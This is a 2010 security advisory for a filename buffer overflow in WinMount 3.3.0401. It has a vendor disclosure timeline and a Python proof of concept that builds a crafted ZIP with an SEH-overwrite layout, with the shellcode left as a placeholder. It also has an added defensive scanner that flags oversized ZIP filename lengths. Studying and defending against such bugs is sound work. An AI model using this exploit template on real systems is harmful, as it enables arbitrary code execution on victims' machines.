WinMount MOU 3.3.0401 File Handling Overflow

19 Apr 2010 00:00:00 | Reported by Lufeng Li | Type: packetstorm | Source: packetstormsecurity.com

WinMount MOU 3.3.0401 File Handling Overflow vulnerability allows arbitrary code execution via crafted ZIP file

Code

WinMount MOU File Handling Overflow Vulnerability

Vulnerability: WinMount 3.3.0401
Vendor: www.winmount.com

1) Software Description:
WinMount is a useful Windows utility. It is a compression tool and also a virtual drive tool. It can compress files, decompress/browse/convert compressed archives, and it can also mount MOU, ZIP, RAR and CD/DVD/HDD images as a virtual disk or virtual folder. Supported formats: MOU ZIP RAR CAB ARJ ISO GZ BZ2 TAR WIM VHD VDI VMDK ISO ISZ BIN MDS/MDF NRG IMG CCD CUE APE FLAC WV.

2) Details:
A filename buffer overflow vulnerability exists in WinMount 3.3.0401. The PoC generates a crafted ZIP file (with an overlong filename); an attacker can then use WinMount to convert that ZIP file into a MOU file. Successful exploitation allows an attacker to execute arbitrary code.
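As an added defensive example (not part of the original advisory and not WinMount's own code): a scanner that walks a ZIP archive's local file headers and central directory headers and flags any filename length field beyond a sane limit, which is the class of input this overflow depends on. The 260-byte threshold (Windows MAX_PATH) and the two constructed sample archives are assumptions.

```python
import io
import struct
import zipfile

# ZIP records that carry a filename length field:
# signature -> (fixed header size, offset of name_len, offsets of the other variable-length fields)
RECORDS = {
    b"PK\x03\x04": (30, 26, (28,)),     # local file header: extra_len at +28
    b"PK\x01\x02": (46, 28, (30, 32)),  # central directory header: extra_len +30, comment_len +32
}
MAX_SANE_NAME_LEN = 260  # assumption: Windows MAX_PATH; tighten or loosen for your environment

def scan_zip_filename_lengths(data, max_name_len=MAX_SANE_NAME_LEN):
    """Return [(offset, signature, name_len, reason)] for each header whose filename length looks hostile."""
    findings = []
    pos = 0
    while pos + 4 <= len(data):
        rec = RECORDS.get(data[pos:pos + 4])
        if rec is None:
            pos += 1  # not a header of interest (file data, EOCD, ...); slide forward
            continue
        hdr_len, name_off, var_offs = rec
        if pos + hdr_len > len(data):
            findings.append((pos, data[pos:pos + 4], None, "truncated header"))
            break
        name_len = struct.unpack_from("<H", data, pos + name_off)[0]
        if name_len > max_name_len:
            findings.append((pos, data[pos:pos + 4], name_len, "filename length exceeds sane limit"))
        elif pos + hdr_len + name_len > len(data):
            findings.append((pos, data[pos:pos + 4], name_len, "filename runs past end of archive"))
        # Skip the fixed header, the name, and every variable-length field the record declares.
        skip = sum(struct.unpack_from("<H", data, pos + off)[0] for off in var_offs)
        pos += hdr_len + name_len + skip
    return findings

def benign_zip():
    """Constructed sample: a normal archive written by the standard library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("notes.txt", "hello")
    return buf.getvalue()

def oversized_name_record():
    """Constructed sample: a central directory header claiming a 0xFFD0-byte filename, padded with 'A'."""
    hdr = b"PK\x01\x02" + b"\x00" * 24 + struct.pack("<H", 0xFFD0) + b"\x00" * 16
    return hdr + b"A" * 0xFFD0

if __name__ == "__main__":
    print("benign:", scan_zip_filename_lengths(benign_zip()))
    print("oversized:", scan_zip_filename_lengths(oversized_name_record()))
```

The scanner is a heuristic: it does not decompress anything and can mis-step if a data stream happens to contain a header signature, so treat a hit as a reason to quarantine and inspect, not as proof of exploitation.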
  
3) Credit:
The vulnerability was discovered by Lufeng Li

4) Timeline:
2010.04.12 Report to vendor
2010.04.14 Vendor upgrades WinMount
2010.04.16 Public

5) PoC:
```python
import os

sploitfile="test.zip"
ldf_header =('\x50\x4B\x03\x04\x14\x00\x00'
'\x00\x08\x00\xB7\xAC\xCE\x34\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\xd0\xff'
'\x00\x00\x00')
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14"
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xd0\xff"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00"
"\x00\x01\x00\x01\x00"
"\xfe\xff\x00\x00"
"\xee\xff\x00\x00"
"\x00\x00")
print "[+] Preparing payload\n"
size=65484
junk='A'*420
nseh='\x89\x8a\x8b\x8c'
seh='\x84\x5b\xac\x8d'
junk_='A'*33
jumpto='\x05\x12\x11\x46\x2d\x11\x11\x46\x50\x46\xac\xe4'#make eax point to shellcode and jump to shellcode
shellcode=("the shellcode here will be changed into unicode")#encode by alpha2
junk__='B'*80
last='C'*(size-420-len(nseh+seh+junk_+jumpto+junk__+shellcode))
payload=junk+nseh+seh+junk_+jumpto+junk__+shellcode+last+".wav"
evilzip = ldf_header+payload+cdf_header+payload+eofcdf_header
print "[+] Removing old zip file\n"
os.system("del "+sploitfile)
print "[+] Writing payload to file\n"
fobj=open(sploitfile,"w",0)
fobj.write(evilzip)
print "generate zip file "+(sploitfile)
fobj.close()
print '[+] Wrote %d bytes to file sploitfile\n'%(len(evilzip))
print "[+] Payload length :%d \n"%(len(payload))
```
  
  
  
--------------  
lilf  
2010-04-17  
  
